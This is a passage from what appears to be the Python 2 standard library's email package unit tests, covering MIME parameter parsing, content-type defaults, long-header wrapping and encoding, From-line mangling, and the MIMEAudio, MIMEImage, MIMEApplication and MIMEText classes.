[('foo', 'one'), ('bar', 'two'), ('baz', 'three')])
msg = email.message_from_string(
'X-Header: foo; bar=one; baz=two\n')
eq(msg.get_params(header='x-header'),
[('foo', ''), ('bar', 'one'), ('baz', 'two')])
eq(msg.get_params(), None)
msg = email.message_from_string(
'X-Header: foo; bar="one"; baz=two\n')
eq(msg.get_params(header='x-header'),
[('foo', ''), ('bar', 'one'), ('baz', 'two')])
def test_get_param_liberal(self):
msg = Message()
msg['Content-Type'] = 'Content-Type: Multipart/mixed; boundary = "CPIMSSMTPC06p5f3tG"'
self.assertEqual(msg.get_param('boundary'), 'CPIMSSMTPC06p5f3tG')
def test_get_param(self):
eq = self.assertEqual
msg = email.message_from_string(
"X-Header: foo=one; bar=two; baz=three\n")
eq(msg.get_param('bar', header='x-header'), 'two')
eq(msg.get_param('quuz', header='x-header'), None)
eq(msg.get_param('quuz'), None)
msg = email.message_from_string(
'X-Header: foo; bar="one"; baz=two\n')
eq(msg.get_param('foo', header='x-header'), '')
eq(msg.get_param('bar', header='x-header'), 'one')
eq(msg.get_param('baz', header='x-header'), 'two')
# XXX: We are not RFC-2045 compliant! We cannot parse:
# msg["Content-Type"] = 'text/plain; weird="hey; dolly? [you] @ <\\"home\\">?"'
# msg.get_param("weird")
# yet.
def test_get_param_funky_continuation_lines(self):
msg = self._msgobj('msg_22.txt')
self.assertEqual(msg.get_payload(1).get_param('name'), 'wibble.JPG')
def test_get_param_with_semis_in_quotes(self):
msg = email.message_from_string(
'Content-Type: image/pjpeg; name="Jim&&Jill"\n')
self.assertEqual(msg.get_param('name'), 'Jim&&Jill')
self.assertEqual(msg.get_param('name', unquote=False),
'"Jim&&Jill"')
def test_has_key(self):
msg = email.message_from_string('Header: exists')
self.assertTrue(msg.has_key('header'))
self.assertTrue(msg.has_key('Header'))
self.assertTrue(msg.has_key('HEADER'))
self.assertFalse(msg.has_key('headeri'))
def test_set_param(self):
eq = self.assertEqual
msg = Message()
msg.set_param('charset', 'iso-2022-jp')
eq(msg.get_param('charset'), 'iso-2022-jp')
msg.set_param('importance', 'high value')
eq(msg.get_param('importance'), 'high value')
eq(msg.get_param('importance', unquote=False), '"high value"')
eq(msg.get_params(), [('text/plain', ''),
('charset', 'iso-2022-jp'),
('importance', 'high value')])
eq(msg.get_params(unquote=False), [('text/plain', ''),
('charset', '"iso-2022-jp"'),
('importance', '"high value"')])
msg.set_param('charset', 'iso-9999-xx', header='X-Jimmy')
eq(msg.get_param('charset', header='X-Jimmy'), 'iso-9999-xx')
def test_del_param(self):
eq = self.assertEqual
msg = self._msgobj('msg_05.txt')
eq(msg.get_params(),
[('multipart/report', ''), ('report-type', 'delivery-status'),
('boundary', 'D1690A7AC1.996856090/mail.example.com')])
old_val = msg.get_param("report-type")
msg.del_param("report-type")
eq(msg.get_params(),
[('multipart/report', ''),
('boundary', 'D1690A7AC1.996856090/mail.example.com')])
msg.set_param("report-type", old_val)
eq(msg.get_params(),
[('multipart/report', ''),
('boundary', 'D1690A7AC1.996856090/mail.example.com'),
('report-type', old_val)])
def test_del_param_on_other_header(self):
msg = Message()
msg.add_header('Content-Disposition', 'attachment', filename='bud.gif')
msg.del_param('filename', 'content-disposition')
self.assertEqual(msg['content-disposition'], 'attachment')
def test_set_type(self):
eq = self.assertEqual
msg = Message()
self.assertRaises(ValueError, msg.set_type, 'text')
msg.set_type('text/plain')
eq(msg['content-type'], 'text/plain')
msg.set_param('charset', 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
msg.set_type('text/html')
eq(msg['content-type'], 'text/html; charset="us-ascii"')
def test_set_type_on_other_header(self):
msg = Message()
msg['X-Content-Type'] = 'text/plain'
msg.set_type('application/octet-stream', 'X-Content-Type')
self.assertEqual(msg['x-content-type'], 'application/octet-stream')
def test_get_content_type_missing(self):
msg = Message()
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_type_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_type(), 'message/rfc822')
def test_get_content_type_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_type(),
'message/rfc822')
def test_get_content_type_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_type(),
'message/rfc822')
def test_get_content_type_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_type_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_maintype_missing(self):
msg = Message()
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_maintype_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_maintype(), 'message')
def test_get_content_maintype_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_maintype(), 'message')
def test_get_content_maintype_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_maintype(), 'message')
def test_get_content_maintype_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_maintype_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_subtype_missing(self):
msg = Message()
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_get_content_subtype_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_get_content_subtype_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_get_content_maintype_error(self):
msg = Message()
msg['Content-Type'] = 'no-slash-in-this-string'
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_subtype_error(self):
msg = Message()
msg['Content-Type'] = 'no-slash-in-this-string'
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_replace_header(self):
eq = self.assertEqual
msg = Message()
msg.add_header('First', 'One')
msg.add_header('Second', 'Two')
msg.add_header('Third', 'Three')
eq(msg.keys(), ['First', 'Second', 'Third'])
eq(msg.values(), ['One', 'Two', 'Three'])
msg.replace_header('Second', 'Twenty')
eq(msg.keys(), ['First', 'Second', 'Third'])
eq(msg.values(), ['One', 'Twenty', 'Three'])
msg.add_header('First', 'Eleven')
msg.replace_header('First', 'One Hundred')
eq(msg.keys(), ['First', 'Second', 'Third', 'First'])
eq(msg.values(), ['One Hundred', 'Twenty', 'Three', 'Eleven'])
self.assertRaises(KeyError, msg.replace_header, 'Fourth', 'Missing')
def test_broken_base64_payload(self):
x = 'AwDp0P7//y6LwKEAcPa/6Q=9'
msg = Message()
msg['content-type'] = 'audio/x-midi'
msg['content-transfer-encoding'] = 'base64'
msg.set_payload(x)
self.assertEqual(msg.get_payload(decode=True), x)
# Test the email.encoders module
class TestEncoders(unittest.TestCase):
def test_encode_empty_payload(self):
eq = self.assertEqual
msg = Message()
msg.set_charset('us-ascii')
eq(msg['content-transfer-encoding'], '7bit')
def test_default_cte(self):
eq = self.assertEqual
msg = MIMEText('hello world')
eq(msg['content-transfer-encoding'], '7bit')
def test_default_cte(self):
eq = self.assertEqual
# With no explicit _charset its us-ascii, and all are 7-bit
msg = MIMEText('hello world')
eq(msg['content-transfer-encoding'], '7bit')
# Similar, but with 8-bit data
msg = MIMEText('hello \xf8 world')
eq(msg['content-transfer-encoding'], '8bit')
# And now with a different charset
msg = MIMEText('hello \xf8 world', _charset='iso-8859-1')
eq(msg['content-transfer-encoding'], 'quoted-printable')
# Test long header wrapping
class TestLongHeaders(TestEmailBase):
def test_split_long_continuation(self):
eq = self.ndiffAssertEqual
msg = email.message_from_string("""\
Subject: bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text
test
""")
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
Subject: bug demonstration
12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
more text
test
""")
def test_another_long_almost_unsplittable_header(self):
eq = self.ndiffAssertEqual
hstr = """\
bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text"""
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text""")
h = Header(hstr)
eq(h.encode(), """\
bug demonstration
12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
more text""")
def test_long_nonstring(self):
eq = self.ndiffAssertEqual
g = Charset("iso-8859-1")
cz = Charset("iso-8859-2")
utf8 = Charset("utf-8")
g_head = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
cz_head = "Finan\xe8ni metropole se hroutily pod tlakem jejich d\xf9vtipu.. "
utf8_head = u"\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das Nunstuck git und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt gersput.\u300d\u3068\u8a00\u3063\u3066\u3044\u307e\u3059\u3002".encode("utf-8")
h = Header(g_head, g, header_name='Subject')
h.append(cz_head, cz)
h.append(utf8_head, utf8)
msg = Message()
msg['Subject'] = h
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
Subject: =?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerd?=
=?iso-8859-1?q?erband_komfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndi?=
=?iso-8859-1?q?schen_Wandgem=E4lden_vorbei=2C_gegen_die_rotierenden_Kling?=
=?iso-8859-1?q?en_bef=F6rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_met?=
=?iso-8859-2?q?ropole_se_hroutily_pod_tlakem_jejich_d=F9vtipu=2E=2E_?=
=?utf-8?b?5q2j56K644Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE?=
=?utf-8?b?44G+44Gb44KT44CC5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB?=
=?utf-8?b?44GC44Go44Gv44Gn44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CM?=
=?utf-8?q?Wenn_ist_das_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das?=
=?utf-8?b?IE9kZXIgZGllIEZsaXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBow==?=
=?utf-8?b?44Gm44GE44G+44GZ44CC?=
""")
eq(h.encode(), """\
=?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerd?=
=?iso-8859-1?q?erband_komfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndi?=
=?iso-8859-1?q?schen_Wandgem=E4lden_vorbei=2C_gegen_die_rotierenden_Kling?=
=?iso-8859-1?q?en_bef=F6rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_met?=
=?iso-8859-2?q?ropole_se_hroutily_pod_tlakem_jejich_d=F9vtipu=2E=2E_?=
=?utf-8?b?5q2j56K644Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE?=
=?utf-8?b?44G+44Gb44KT44CC5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB?=
=?utf-8?b?44GC44Go44Gv44Gn44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CM?=
=?utf-8?q?Wenn_ist_das_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das?=
=?utf-8?b?IE9kZXIgZGllIEZsaXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBow==?=
=?utf-8?b?44Gm44GE44G+44GZ44CC?=""")
def test_long_header_encode(self):
eq = self.ndiffAssertEqual
h = Header('wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"',
header_name='X-Foobar-Spoink-Defrobnit')
eq(h.encode(), '''\
wasnipoop; giraffes="very-long-necked-animals";
spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"''')
def test_long_header_encode_with_tab_continuation(self):
eq = self.ndiffAssertEqual
h = Header('wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"',
header_name='X-Foobar-Spoink-Defrobnit',
continuation_ws='\t')
eq(h.encode(), '''\
wasnipoop; giraffes="very-long-necked-animals";
\tspooge="yummy"; hippos="gargantuan"; marshmallows="gooey"''')
def test_header_splitter(self):
eq = self.ndiffAssertEqual
msg = MIMEText('')
# It'd be great if we could use add_header() here, but that doesn't
# guarantee an order of the parameters.
msg['X-Foobar-Spoink-Defrobnit'] = (
'wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"')
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), '''\
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Foobar-Spoink-Defrobnit: wasnipoop; giraffes="very-long-necked-animals";
spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"
''')
def test_no_semis_header_splitter(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['From'] = '[email protected]'
msg['References'] = SPACE.join(['<%[email protected]>' % i for i in range(10)])
msg.set_payload('Test')
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
From: [email protected]
References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]>
<[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]>
Test""")
def test_no_split_long_header(self):
eq = self.ndiffAssertEqual
hstr = 'References: ' + 'x' * 80
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
References: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx""")
def test_splitting_multiple_long_lines(self):
eq = self.ndiffAssertEqual
hstr = """\
from babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <[email protected]>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <[email protected]>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <[email protected]>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
"""
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
from babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <[email protected]>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <[email protected]>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <[email protected]>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)""")
def test_splitting_first_line_only_is_long(self):
eq = self.ndiffAssertEqual
hstr = """\
from modemcable093.139-201-24.que.mc.videotron.ca ([24.201.139.93] helo=cthulhu.gerg.ca)
\tby kronos.mems-exchange.org with esmtp (Exim 4.05)
\tid 17k4h5-00034i-00
\tfor [email protected]; Wed, 28 Aug 2002 11:25:20 -0400"""
h = Header(hstr, maxlinelen=78, header_name='Received',
continuation_ws='\t')
eq(h.encode(), """\
from modemcable093.139-201-24.que.mc.videotron.ca ([24.201.139.93]
\thelo=cthulhu.gerg.ca)
\tby kronos.mems-exchange.org with esmtp (Exim 4.05)
\tid 17k4h5-00034i-00
\tfor [email protected]; Wed, 28 Aug 2002 11:25:20 -0400""")
def test_long_8bit_header(self):
eq = self.ndiffAssertEqual
msg = Message()
h = Header('Britische Regierung gibt', 'iso-8859-1',
header_name='Subject')
h.append('gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte')
msg['Subject'] = h
eq(msg.as_string(), """\
Subject: =?iso-8859-1?q?Britische_Regierung_gibt?= =?iso-8859-1?q?gr=FCnes?=
=?iso-8859-1?q?_Licht_f=FCr_Offshore-Windkraftprojekte?=
""")
def test_long_8bit_header_no_charset(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['Reply-To'] = 'Britische Regierung gibt gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte <[email protected]>'
eq(msg.as_string(), """\
Reply-To: Britische Regierung gibt gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte <[email protected]>
""")
def test_long_to_header(self):
eq = self.ndiffAssertEqual
to = '"Someone Test #A" <[email protected]>,<[email protected]>,"Someone Test #B" <[email protected]>, "Someone Test #C" <[email protected]>, "Someone Test #D" <[email protected]>'
msg = Message()
msg['To'] = to
eq(msg.as_string(0), '''\
To: "Someone Test #A" <[email protected]>, <[email protected]>,
"Someone Test #B" <[email protected]>,
"Someone Test #C" <[email protected]>,
"Someone Test #D" <[email protected]>
''')
def test_long_line_after_append(self):
eq = self.ndiffAssertEqual
s = 'This is an example of string which has almost the limit of header length.'
h = Header(s)
h.append('Add another line.')
eq(h.encode(), """\
This is an example of string which has almost the limit of header length.
Add another line.""")
def test_shorter_line_with_append(self):
eq = self.ndiffAssertEqual
s = 'This is a shorter line.'
h = Header(s)
h.append('Add another sentence. (Surprise?)')
eq(h.encode(),
'This is a shorter line. Add another sentence. (Surprise?)')
def test_long_field_name(self):
eq = self.ndiffAssertEqual
fn = 'X-Very-Very-Very-Long-Header-Name'
gs = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
h = Header(gs, 'iso-8859-1', header_name=fn)
# BAW: this seems broken because the first line is too long
eq(h.encode(), """\
=?iso-8859-1?q?Die_Mieter_treten_hier_?=
=?iso-8859-1?q?ein_werden_mit_einem_Foerderband_komfortabel_den_Korridor_?=
=?iso-8859-1?q?entlang=2C_an_s=FCdl=FCndischen_Wandgem=E4lden_vorbei=2C_g?=
=?iso-8859-1?q?egen_die_rotierenden_Klingen_bef=F6rdert=2E_?=""")
def test_long_received_header(self):
h = 'from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by hrothgar.la.mastaler.com (tmda-ofmipd) with ESMTP; Wed, 05 Mar 2003 18:10:18 -0700'
msg = Message()
msg['Received-1'] = Header(h, continuation_ws='\t')
msg['Received-2'] = h
self.ndiffAssertEqual(msg.as_string(), """\
Received-1: from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by
\throthgar.la.mastaler.com (tmda-ofmipd) with ESMTP;
\tWed, 05 Mar 2003 18:10:18 -0700
Received-2: from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by
hrothgar.la.mastaler.com (tmda-ofmipd) with ESMTP;
Wed, 05 Mar 2003 18:10:18 -0700
""")
def test_string_headerinst_eq(self):
h = '<15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de> (David Bremner\'s message of "Thu, 6 Mar 2003 13:58:21 +0100")'
msg = Message()
msg['Received'] = Header(h, header_name='Received-1',
continuation_ws='\t')
msg['Received'] = h
self.ndiffAssertEqual(msg.as_string(), """\
Received: <15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de>
\t(David Bremner's message of "Thu, 6 Mar 2003 13:58:21 +0100")
Received: <15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de>
(David Bremner's message of "Thu, 6 Mar 2003 13:58:21 +0100")
""")
def test_long_unbreakable_lines_with_continuation(self):
eq = self.ndiffAssertEqual
msg = Message()
t = """\
iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
locQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp"""
msg['Face-1'] = t
msg['Face-2'] = Header(t, header_name='Face-2')
eq(msg.as_string(), """\
Face-1: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
locQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp
Face-2: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
locQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp
""")
def test_another_long_multiline_header(self):
eq = self.ndiffAssertEqual
m = '''\
Received: from siimage.com ([172.25.1.3]) by zima.siliconimage.com with Microsoft SMTPSVC(5.0.2195.4905);
Wed, 16 Oct 2002 07:41:11 -0700'''
msg = email.message_from_string(m)
eq(msg.as_string(), '''\
Received: from siimage.com ([172.25.1.3]) by zima.siliconimage.com with
Microsoft SMTPSVC(5.0.2195.4905); Wed, 16 Oct 2002 07:41:11 -0700
''')
def test_long_lines_with_different_header(self):
eq = self.ndiffAssertEqual
h = """\
List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
<mailto:[email protected]?subject=unsubscribe>"""
msg = Message()
msg['List'] = h
msg['List'] = Header(h, header_name='List')
self.ndiffAssertEqual(msg.as_string(), """\
List: List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
<mailto:[email protected]?subject=unsubscribe>
List: List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
<mailto:[email protected]?subject=unsubscribe>
""")
# Test mangling of "From " lines in the body of a message
class TestFromMangling(unittest.TestCase):
def setUp(self):
self.msg = Message()
self.msg['From'] = '[email protected]'
self.msg.set_payload("""\
From the desk of A.A.A.:
Blah blah blah
""")
def test_mangled_from(self):
s = StringIO()
g = Generator(s, mangle_from_=True)
g.flatten(self.msg)
self.assertEqual(s.getvalue(), """\
From: [email protected]
>From the desk of A.A.A.:
Blah blah blah
""")
def test_dont_mangle_from(self):
s = StringIO()
g = Generator(s, mangle_from_=False)
g.flatten(self.msg)
self.assertEqual(s.getvalue(), """\
From: [email protected]
From the desk of A.A.A.:
Blah blah blah
""")
# Test the basic MIMEAudio class
class TestMIMEAudio(unittest.TestCase):
def setUp(self):
# Make sure we pick up the audiotest.au that lives in email/test/data.
# In Python, there's an audiotest.au living in Lib/test but that isn't
# included in some binary distros that don't include the test
# package. The trailing empty string on the .join() is significant
# since findfile() will do a dirname().
datadir = os.path.join(os.path.dirname(landmark), 'data', '')
fp = open(findfile('audiotest.au', datadir), 'rb')
try:
self._audiodata = fp.read()
finally:
fp.close()
self._au = MIMEAudio(self._audiodata)
def test_guess_minor_type(self):
self.assertEqual(self._au.get_content_type(), 'audio/basic')
def test_encoding(self):
payload = self._au.get_payload()
self.assertEqual(base64.decodestring(payload), self._audiodata)
def test_checkSetMinor(self):
au = MIMEAudio(self._audiodata, 'fish')
self.assertEqual(au.get_content_type(), 'audio/fish')
def test_add_header(self):
eq = self.assertEqual
self._au.add_header('Content-Disposition', 'attachment',
filename='audiotest.au')
eq(self._au['content-disposition'],
'attachment; filename="audiotest.au"')
eq(self._au.get_params(header='content-disposition'),
[('attachment', ''), ('filename', 'audiotest.au')])
eq(self._au.get_param('filename', header='content-disposition'),
'audiotest.au')
missing = []
eq(self._au.get_param('attachment', header='content-disposition'), '')
self.assertIs(self._au.get_param('foo', failobj=missing,
header='content-disposition'),
missing)
# Try some missing stuff
self.assertIs(self._au.get_param('foobar', missing), missing)
self.assertIs(self._au.get_param('attachment', missing,
header='foobar'), missing)
# Test the basic MIMEImage class
class TestMIMEImage(unittest.TestCase):
def setUp(self):
fp = openfile('PyBanner048.gif')
try:
self._imgdata = fp.read()
finally:
fp.close()
self._im = MIMEImage(self._imgdata)
def test_guess_minor_type(self):
self.assertEqual(self._im.get_content_type(), 'image/gif')
def test_encoding(self):
payload = self._im.get_payload()
self.assertEqual(base64.decodestring(payload), self._imgdata)
def test_checkSetMinor(self):
im = MIMEImage(self._imgdata, 'fish')
self.assertEqual(im.get_content_type(), 'image/fish')
def test_add_header(self):
eq = self.assertEqual
self._im.add_header('Content-Disposition', 'attachment',
filename='dingusfish.gif')
eq(self._im['content-disposition'],
'attachment; filename="dingusfish.gif"')
eq(self._im.get_params(header='content-disposition'),
[('attachment', ''), ('filename', 'dingusfish.gif')])
eq(self._im.get_param('filename', header='content-disposition'),
'dingusfish.gif')
missing = []
eq(self._im.get_param('attachment', header='content-disposition'), '')
self.assertIs(self._im.get_param('foo', failobj=missing,
header='content-disposition'),
missing)
# Try some missing stuff
self.assertIs(self._im.get_param('foobar', missing), missing)
self.assertIs(self._im.get_param('attachment', missing,
header='foobar'), missing)
# Test the basic MIMEApplication class
class TestMIMEApplication(unittest.TestCase):
def test_headers(self):
eq = self.assertEqual
msg = MIMEApplication('\xfa\xfb\xfc\xfd\xfe\xff')
eq(msg.get_content_type(), 'application/octet-stream')
eq(msg['content-transfer-encoding'], 'base64')
def test_body(self):
eq = self.assertEqual
bytes = '\xfa\xfb\xfc\xfd\xfe\xff'
msg = MIMEApplication(bytes)
eq(msg.get_payload(), '+vv8/f7/')
eq(msg.get_payload(decode=True), bytes)
def test_binary_body_with_encode_7or8bit(self):
# Issue 17171.
bytesdata = b'\xfa\xfb\xfc\xfd\xfe\xff'
msg = MIMEApplication(bytesdata, _encoder=encoders.encode_7or8bit)
# Treated as a string, this will be invalid code points.
self.assertEqual(msg.get_payload(), bytesdata)
self.assertEqual(msg.get_payload(decode=True), bytesdata)
self.assertEqual(msg['Content-Transfer-Encoding'], '8bit')
s = StringIO()
g = Generator(s)
g.flatten(msg)
wireform = s.getvalue()
msg2 = email.message_from_string(wireform)
self.assertEqual(msg.get_payload(), bytesdata)
self.assertEqual(msg2.get_payload(decode=True), bytesdata)
self.assertEqual(msg2['Content-Transfer-Encoding'], '8bit')
def test_binary_body_with_encode_noop(self):
# Issue 16564: This does not produce an RFC valid message, since to be
# valid it should have a CTE of binary. But the below works, and is
# documented as working this way.
bytesdata = b'\xfa\xfb\xfc\xfd\xfe\xff'
msg = MIMEApplication(bytesdata, _encoder=encoders.encode_noop)
self.assertEqual(msg.get_payload(), bytesdata)
self.assertEqual(msg.get_payload(decode=True), bytesdata)
s = StringIO()
g = Generator(s)
g.flatten(msg)
wireform = s.getvalue()
msg2 = email.message_from_string(wireform)
self.assertEqual(msg.get_payload(), bytesdata)
self.assertEqual(msg2.get_payload(decode=True), bytesdata)
# Test the basic MIMEText class
class TestMIMEText(unittest.TestCase):
def setUp(self):
self._msg = MIMEText('hello there')
def test_types(self):
eq = self.assertEqual
eq(self._msg.get_content_type(), 'text/plain')
eq(self._msg.get_param('charset'), 'us-ascii')
missing = []
self.assertIs(self._msg.get_param('foobar', missing), missing)
self.assertIs(self._msg.get_param('charset', missing, header='foobar'),
missing)
def test_payload(self):
self.assertEqual(self._msg.get_payload(), 'hello there')
self.assertFalse(self._msg.is_multipart())
def test_charset(self):
eq = self.assertEqual
msg = MIMEText('hello there', _charset='us-ascii')
eq(msg.get_charset().input_charset, 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
# Test complicated multipart/* messages
class TestMultipart(TestEmailBase):
def setUp(self):
fp = openfile('PyBanner048.gif')
try:
data = fp.read()
finally:
fp.close()
container = MIMEBase('multipart', 'mixed', boundary='BOUNDARY')
image = MIMEImage(data, name='dingusfish.gif')
image.add_header('content-disposition', 'attachment',
filename='dingusfish.gif')
intro = MIMEText('''\
Hi there,
This is the dingus fish.
''')
container.attach(intro)
container.attach(image)
container['From'] = 'Barry <[email protected]>'
container['To'] = 'Dingus Lovers <[email protected]>'
container['Subject'] = 'Here is your dingus fish'
now = 987809702.54848599
timetuple = time.localtime(now)
if timetuple[-1] == 0:
tzsecs = time.timezone
else:
tzsecs = time.altzone
if tzsecs > 0:
sign = '-'
else:
sign = '+'
tzoffset = ' %s%04d' % (sign, tzsecs // 36)
container['Date'] = time.strftime(
'%a, %d %b %Y %H:%M:%S',
time.localtime(now)) + tzoffset
